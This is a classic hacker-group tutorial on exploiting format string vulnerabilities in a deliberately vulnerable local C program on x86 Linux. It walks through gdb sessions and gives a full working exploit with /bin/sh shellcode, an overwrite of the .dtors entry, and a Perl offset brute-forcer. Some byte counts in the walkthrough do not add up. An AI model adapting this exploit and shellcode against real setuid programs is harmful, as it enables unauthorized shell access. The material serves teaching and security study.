=-Promisc Digital Research Group (http://www.promisc.org)-=
=-                                                        -=
=-  Exploiting local format string holes on x86/linux     -=
=-  The Itch (itchie@promisc.org)                         -=
=-  Presents                                              -=

A long time ago, in a galaxy far, far away ....

---

A coder, it's late at night, and he has to finish his program, due tomorrow.
Since it's late and he is rushing, he sometimes forgets the proper form of
snprintf, so he writes:

        snprintf (buf, sizeof(buf)-1, arg);

instead of

        snprintf (buf, sizeof(buf)-1, "%s", arg);

Now, without knowing it, the programmer has handed us complete control over
his program, through the method known as format string exploitation.

Let's look at a short version of the situation described above:

-----------------fmt.c----------------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void vulnerable(char *arg)
{
        char buf[1024];
        char string[64];

        strcpy (string, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");

        snprintf (buf, sizeof(buf)-1, arg); /* the vulnerability itself */

        printf ("%s\n", buf);

        return;
}

int main(int argc, char **argv)
{
        if (argc > 1)
                vulnerable(argv[1]);

        return (0);
}
-----------------fmt.c----------------

[itchie@bse fmt]$ gcc fmt.c -g -ggdb3 -o fmt

(We use -g -ggdb3 for extra debugging information.)

[itchie@bse fmt]$ ./fmt BBBB
BBBB
[itchie@bse fmt]$ ./fmt %p
0x41414141
[itchie@bse fmt]$ ./fmt %p.%p.%p.%n
Segmentation fault (core dumped)

Interesting, the program gives a segmentation fault. Let's examine:

[itchie@bse fmt]$ gdb -q fmt core
Core was generated by `./fmt %p.%p.%p.%n'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
#0  0x0016e817 in _IO_vfprintf (s=0xbffff5bc, format=0xbffffc62 "%p.%p.%p.%n",
    ap=0xbffff6dc) at vfprintf.c:1212
1212    vfprintf.c: No such file or directory.
        in vfprintf.c
(gdb) x/i 0x0016e817
0x16e817 <_IO_vfprintf+2455>:   mov    %eax,(%ecx)
(gdb) printf "eax: %08x\necx: %08x\n", $eax, $ecx
eax: 00000021
ecx: 41414141

Well, that is very nice and interesting: the program crashes when it tries to
store the value of eax at the address held in ecx. Now let's look at what
exactly happened. Why is eax 0x00000021 and ecx 0x41414141?

0x21 is 33 in decimal. When we gave %p.%p.%p.%n as the argument, 33 bytes had
been written by the time %n was reached: %p.%p.%p. expands to
0x41414141.0x41414141.0x41414141. which is three times 10 bytes (yes, count
the 0 and the x too) plus three dots, so 33 bytes or 0x21 in total. The %n
itself prints nothing; it stores that count through the next pointer it finds
on the stack. So in this case we tried to write 0x21 to 0x41414141, which is
an illegal address.

How did we get 0x41414141? In the code of the vulnerable program you will see
the following:

        strcpy (string, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
        snprintf (buf, sizeof(buf)-1, arg); /* the vulnerability itself */

Apparently, when we write %p or %x, we see the contents of string, a variable
that was filled before the vulnerable call. What happens is this: when a
*printf function meets a format specifier that has no matching argument, it
simply takes the next words from the stack.

This is all nice, but 0x41414141 is completely useless to us if we want to
exploit the program, so let's investigate some more. Let's give it some valid
data followed by some format specifiers.

[itchie@bse fmt]$ ./fmt "BBBB %x %x %x %x %x %x"
BBBB 41414141 41414141 41414141 41414141 41414141 41414141

Hmm, we are still reading the part of the stack that was filled before the
actual format string vulnerability. Useless, but wouldn't it be nice if it
eventually got to snprintf's own part of the stack and started reading that?
Let's test:

[itchie@bse fmt]$ ./fmt "BBBB %x %x %x %x %x %x %x %x %x %x %x %x %x %x"
BBBB 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141
41414141 41414141 41414141 41414141 414141 80482b4

Well, it seems we hit something odd. By the looks of it, 0x080482b4 is not a
stack address but an address inside the program image itself. GDB is your
friend. Let's break at line 24 of the vulnerable program (the return in main).

[itchie@bse fmt]$ gdb -q fmt
(gdb) set args "BBBB %x %x %x %x %x %x %x %x %x %x %x %x %x %x"
(gdb) break 24
Breakpoint 1 at 0x80484ae: file fmt.c, line 24.
(gdb) run
Starting program: /home/itchie/public_html/stuff/exploits/fmt/fmt "BBBB %x %x
%x %x %x %x %x %x %x %x %x %x %x %x"
BBBB 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141
41414141 41414141 41414141 41414141 414141 80482b4

Breakpoint 1, main (argc=2, argv=0xbffffaf4) at fmt.c:24
24              return (0);
(gdb) x/x 0x080482b4
0x80482b4:      0x080495f8
(gdb) x/i 0x080495f8
0x80495f8 <_GLOBAL_OFFSET_TABLE_+12>:   pusha
(gdb)

OK, it looks like the word stored at that address points somewhere into the
GOT section. We could use that address, but it would be much, much easier if
we could supply our own. So let's play some more with a few extra %x's:

[itchie@bse fmt]$ ./fmt "BBBB %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x"
BBBB 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141
41414141 41414141 41414141 41414141 414141 80482b4 0 1 42424242

Funny, 0x42424242 is BBBB: we have finally hit the part of the stack that
holds our own input. It took us 17 %x's to get there.

Now it really gets interesting. According to this, we can write any number to
any address with %n. However, we do have a problem: %n writes the number of
bytes written so far. That is no problem with low numbers, but think about it.
If we want to write, for example, 0xbffffb10, then we have to output
3221224208 bytes first. That's a little too big to write all at once.
(Older libc's can't handle numbers that large.)

So instead of writing the address as one 32-bit word, we write it as two
16-bit words. A 16-bit word can hold a maximum of 65535. We do this by using
%hn instead of %n. In other words, we must split our address 0xbffffb10 into
two parts, namely 0xbfff (49151 decimal) and 0xfb10 (64272 decimal).

We have an address now, but where should we write it? We have many
possibilities: the saved EIP, the .dtors section, the GOT section. For the
time being we choose a static address in the .dtors section. To find the
.dtors section we simply do:

[itchie@bse fmt]$ objdump -h fmt|grep dtor
 17 .dtors        00000008  080495e4  080495e4  000005e4  2**2

Our .dtors target is 0x080495e4 + 4 = 0x080495e8. Because x86 is
little-endian, the upper half of the value (0xbfff) lives at 0x080495e8 + 2
and the lower half (0xfb10) at 0x080495e8. And because %hn stores a count that
only ever grows, the smaller half has to be written first. So we write in 2
steps: first 0xbfff to 0x080495e8 + 2, and then 0xfb10 to 0x080495e8.

Remember, our input came back at the 17th %x. But first we must count how many
bytes the stack popping itself prints. Let's count. We get this back when we
give 17 %x's:

41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141
41414141 41414141 41414141 41414141 414141 80482b4 0 1

(discard the spaces). The number of bytes is: 113

We have to write:

        49151 - 8 = 49143
          ^     ^
          ^     ^---- The 2 addresses we write to.
          ^---- 0xbfff

This is the first write. And then we have to write our second value:

        64272 - 49151 - 113 = 15008
          ^       ^      ^
          ^       ^      ^---- our stack popping (output of 17 %x's)
          ^       ^---- 0xbfff (we wrote that already)
          ^---- 0xfb10

This is our second write. So let's start constructing our format string:

        0x080495e8+2 0x080495e8 %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x
        %.49143u%hn %.15008u%hn

Now, as you can see, popping the stack like that is a rather sloppy way to do
it. On another machine you might not get exactly 113 bytes but maybe 110 or
116, and the bookkeeping is easy to get wrong, since every popped byte and
every consumed argument shifts the counts. To solve this, we use %number$.
This way we can write %17$x to print what the 17th %x would print.
This also works with %number$hn. So instead of the format string above we use
the following one. We also bypass the stack popping, so in this case you
should NOT deduct 113 from the second number (the one for 0xfb10).

        0x080495e8+2 0x080495e8 %.49143u%17$hn %.15121u%18$hn
                                                 ^
                                                 ^---- 15008 + 113

Or, in exploit code form:

---------fmtexpl1.c-----------
/* Format string exploit for fmt.c
 * Coded by The Itch and Gyan Chawdhary
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define NOP     0x90
#define EGGSIZE 2048

/* execve /bin/sh */
char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main(int argc, char *argv[])
{
        char *fmt;
        unsigned int low, high;
        char egg[EGGSIZE];
        unsigned long smashaddr = 0x080495e8;   /* overwrite */
        unsigned long writeaddr = 0xbffffb10;   /* write this */
        char splitaddr0, splitaddr1, splitaddr2, splitaddr3;

        /* split the target address into bytes (emitted little-endian below) */
        splitaddr0 = (smashaddr & 0xff000000) >> 24;
        splitaddr1 = (smashaddr & 0x00ff0000) >> 16;
        splitaddr2 = (smashaddr & 0x0000ff00) >> 8;
        splitaddr3 = (smashaddr & 0x000000ff);

        /* writeaddr = 0xc0debabe; writeaddr & 0x0000ffff = 0xbabe; */
        high = (writeaddr & 0xffff0000) >> 16;
        low  = (writeaddr & 0x0000ffff);

        if(!(fmt = malloc(256))) {printf("malloc()\n"); exit(-1);}

        /* zero the memory */
        memset(fmt, 0x00, 256);
        memset(egg, 0x00, EGGSIZE);

        /* shellcode preparation */
        memset (egg, NOP, EGGSIZE - strlen (shellcode));
        memcpy (egg + EGGSIZE - strlen (shellcode) - 1, shellcode,
                strlen (shellcode));

        /* %hn stores a running count that only grows, so the smaller
         * half must be written first: for 0xbffffb10 that means 0xbfff
         * comes BEFORE 0xfb10. Argument 17 is smashaddr + 2 (gets the
         * high half), argument 18 is smashaddr (gets the low half). */
        if(high < low) {
                sprintf(fmt,
                        "%c%c%c%c"
                        "%c%c%c%c"
                        "%%.%ud%%17$hn"
                        "%%.%ud%%18$hn",
                        splitaddr3 + 2, splitaddr2, splitaddr1, splitaddr0,
                        splitaddr3, splitaddr2, splitaddr1, splitaddr0,
                        high - 8, low - high);
        } else {
                /* low half is smaller: write it first, through argument 18 */
                sprintf(fmt,
                        "%c%c%c%c"
                        "%c%c%c%c"
                        "%%.%ud%%18$hn"
                        "%%.%ud%%17$hn",
                        splitaddr3 + 2, splitaddr2, splitaddr1, splitaddr0,
                        splitaddr3, splitaddr2, splitaddr1, splitaddr0,
                        low - 8, high - low);
        }

        /* create environment var with our shellcode */
        egg[EGGSIZE -1] = '\0';
        memcpy(egg, "EGG=", 4);
        putenv(egg);

        /* format it! */
        execl("./fmt", "fmt", fmt, NULL);

        return 0;
}
--------fmtexpl1.c-------------

Now, if everything went well, you will see A LOT of 0's going by on the
screen. And if you are lucky you will see a shell after that, something like:

sh-2.04$

Otherwise you will see a lot of 0's and then a message like Segmentation fault
or Illegal instruction. That is OK. It means our exploit wasn't entirely right
yet, and we can examine what exactly happened by using the core file.

$ gdb -q fmt core
Core was generated by `fmt %.49143d%17$hn%.15008%18$hn'.
Program terminated with signal, Illegal instruction.
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
#0  0xbffffb10 in ?? ()
(gdb)

This is good: we did overwrite the .dtors entry, and that changed our EIP.
However, we did not manage to land in our shellcode. To increase our chances
of reaching the shellcode we can do 2 things. First of all, we can make
#define EGGSIZE 2048 bigger, maybe 4096 or even more, until eventually we land
in the NOPs in front of our shellcode. A more efficient way would be to take
the current esp and calculate the position of our shellcode from there.
Whichever you choose, it will work. In our case I chose the first one.

$ ./fmtexpl1
00000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000
....
sh-2.04$

And we got a shell.

This was a basic example of a format string exploit. In many cases it will
take much more stack popping before you reach your own input.
The best thing to do in such cases is to use a small brute-force utility like
the one below:

-----bruteforce.pl------
#!/usr/bin/perl
# created by lucipher

my $proggy = "./fmt ";
my ($i, $x, $seq);

# add one more %x per round until our BBBB marker (42424242) shows up
for ($i = 0; $i < 500; $i++) {
        $seq = $i * 1;
        $x .= " %x " . $seq;
        if ((system sprintf("%s \"BBBB %s\"|grep 4242 >/dev/null\n",
                            $proggy, $x)) == 0) {
                $seq++;
                print "%x: $seq\nstring: 42424242\n";
                exit;
        }
}
-----bruteforce.pl------

$ ./bruteforce.pl
%x: 17
string: 42424242
$

With this program we can quickly determine how many %x's are needed. In our
example program it only took 17 %x's, but in larger programs it can take many
more.

I think I have given you all the basic format string exploitation knowledge;
the rest you should be able to find out yourself.

Oh, by the way, functions that are vulnerable to wrong formatting are:

        fprintf();   printf();   sprintf();   snprintf();
        vfprintf();  vprintf();  vsprintf();  vsnprintf();
        setproctitle();  syslog();

and many others like err*, verr*, warn* and vwarn*.

It's just too bad that format string holes are rarely seen these days; they
were big around the year 2000. Nevertheless, they are interesting enough to
know more about.

--
- The Itch
- itchie@promisc.org